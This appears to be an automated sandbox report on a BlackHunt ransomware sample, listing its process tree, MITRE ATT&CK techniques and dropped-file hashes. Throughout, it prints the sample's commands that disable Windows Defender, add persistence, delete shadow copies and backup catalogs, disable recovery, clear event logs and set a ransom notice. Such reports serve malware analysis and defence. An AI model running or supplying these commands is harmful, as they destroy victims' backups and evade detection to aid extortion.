Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\4b24ed0666e835e2ab67eabd91427e889623c645df9609082ca976524a7e0798.exe"C:\Users\Admin\AppData\Local\Temp\4b24ed0666e835e2ab67eabd91427e889623c645df9609082ca976524a7e0798.exe"1⤵
- UAC bypass
- Checks computer location settings
- Checks whether UAC is enabled
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:556 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵
- Suspicious use of WriteProcessMemory
PID:3956 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f3⤵
- Adds Run key to start application
PID:1328
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:1736 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:3644
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵PID:1196
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f3⤵
- Modifies registry class
PID:4716
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:1688 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:1548
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:3636 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f3⤵PID:2000
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:5012 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f3⤵
- Modifies registry class
PID:5060
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:3920 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:1156
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵PID:3152
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵PID:4116
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f3⤵PID:4904
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:1368 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f3⤵PID:1148
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:1976 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f3⤵PID:980
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵PID:3300
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f3⤵PID:1764
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:3760
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f3⤵PID:4164
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:1864
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:4576
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:504
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f3⤵PID:4368
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:1964
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f3⤵PID:3044
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:4176
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:5032
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:4408
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f3⤵PID:4316
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:1100
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f3⤵PID:1980
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:532
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f3⤵PID:2164
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:1548
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f3⤵PID:3660
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:3552
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f3⤵PID:2316
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:4964
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f3⤵PID:8336
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:976
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f3⤵PID:6508
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\4b24ed0666e835e2ab67eabd91427e889623c645df9609082ca976524a7e0798.exe" /F2⤵PID:1036
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\4b24ed0666e835e2ab67eabd91427e889623c645df9609082ca976524a7e0798.exe" /F3⤵
- Creates scheduled task(s)
PID:4500
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵PID:3824
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
- Suspicious use of WriteProcessMemory
PID:1196
-
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:5980
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:5008
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:7220
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:1088
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB3⤵
- Interacts with shadow copies
PID:6708
-
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
- Suspicious use of WriteProcessMemory
PID:3152 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f4⤵PID:3488
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵
- Suspicious use of WriteProcessMemory
PID:4116 -
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:6088
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:4272
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:5800
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:5064
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:5760
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:1248
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:5792
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:3408
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:4928
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:4308
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:5872
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:1112
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:4312
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:4320
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵PID:1476
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵PID:1320
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:1996
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f2⤵PID:11748
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f3⤵PID:13280
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f2⤵PID:12256
-
C:\Windows\system32\taskkill.exetaskkill /IM mshta.exe /f3⤵
- Kills process with taskkill
PID:14500
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt2⤵PID:7384
-
C:\Windows\system32\notepad.exenotepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt3⤵PID:8692
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta2⤵PID:6992
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\#BlackHunt_ReadMe.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵PID:6520
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6520 -s 14524⤵
- Program crash
PID:12328
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\4b24ed0666e835e2ab67eabd91427e889623c645df9609082ca976524a7e0798.exe"2⤵PID:12512
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
PID:8208
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f2⤵PID:12200
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f2⤵PID:12216
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "Windows Critical Update" /F2⤵PID:12164
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f2⤵PID:11588
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:11760
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:576
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:11520
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:12400
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:12472
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:13148
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false2⤵PID:13068
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security2⤵PID:13180
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application2⤵PID:11892
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System2⤵PID:12912
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup2⤵PID:12880
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\2⤵PID:11780
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\2⤵PID:11660
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\2⤵PID:11540
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f1⤵PID:4472
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f1⤵PID:3536
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:7552
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Interacts with shadow copies
PID:7044
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵PID:4928
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f1⤵PID:1216
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f1⤵PID:1248
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f1⤵PID:1144
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:7940
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:19684
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵PID:13096
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D M:\1⤵PID:12848
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Setup1⤵
- Clears Windows event logs
PID:13240
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl System1⤵
- Clears Windows event logs
PID:11428
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security /e:false1⤵
- Clears Windows event logs
PID:13028
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:1⤵
- Deletes NTFS Change Journal
PID:12072
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet1⤵
- Deletes backup catalog
PID:13540
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 6520 -ip 65201⤵PID:13204
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f1⤵PID:10592
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Delete /TN "Windows Critical Update" /F1⤵PID:9056
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f1⤵PID:12784
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f1⤵PID:12852
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable1⤵PID:13052
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures1⤵
- Modifies boot configuration data using bcdedit
PID:11592
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Interacts with shadow copies
PID:11928
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No1⤵
- Modifies boot configuration data using bcdedit
PID:12812
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Application1⤵
- Clears Windows event logs
PID:11132
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security1⤵
- Clears Windows event logs
PID:11776
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D C:\1⤵PID:12840
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D F:\1⤵PID:12496
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
4File Deletion
3Modify Registry
4Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5e9600620082fff9e292bbec23377ff2f
SHA1d90fc55a4c0d1a5cdf0a34a7ede70f63ec9d8e66
SHA2563bdd584dc57a29ec2adeafc61b7e5f2f23bd9138bd240d23edd632bd4d9b2b63
SHA5126044aaf9fffe1897db883f036572f8537a6e959397154009ef862cdbb81fcd4cc458740468cca5736f659d986fa8f74704b6025f26fa08bfdf1058d8edd316c8
-
Filesize
8KB
MD5c31c0c1ef568bbae9ce8f711a70e4525
SHA1e14a9eee7d628ee5c895b8ee961493ea00a1ca45
SHA256bc87fbcd50a974b1fccab3645806e523b48fb7223513f0909713abb9ba0b4736
SHA5123392b44a149eff5feed5b9e2512a24cf79b19ca51f319360172c53431b65f425ab2b51e9fc1ab0b1dcdc5351021294dd8915a2df3ee3999bffddb759107893ac
-
Filesize
12KB
MD5f8e920c13b07af36e14d135ef1eead49
SHA1bfd486bafe2f2bd64d11dc438e373d75871e7cf0
SHA2564d9272c999788c312d37119e08aa9d7605eab01ad5da7335642057721344799b
SHA5125787f280a0f24b0c0a72967aba746454f26b61f6d14b2f80da89b6b402fb0850f6dc64f72a75501aaa920838cddfaf42d0b75baed96e1a852cae4d41f88d8a9e
-
Filesize
684B
MD5928f58345affb9672b1351d4bf8fff31
SHA1881534950c959c708ac7fcc710580256bfb45b93
SHA25630caca46a06857d5787b7df34458b1af5f2e69dd83763507f29915fb6e479f94
SHA5123138b29018100ab03b2f389acf5f7c6185e556e4741a25d50443e51ab5ad99448ea5654c5e349f874be1bf8029f739ce6db8440eeb993b331eaed46a5cab4c7a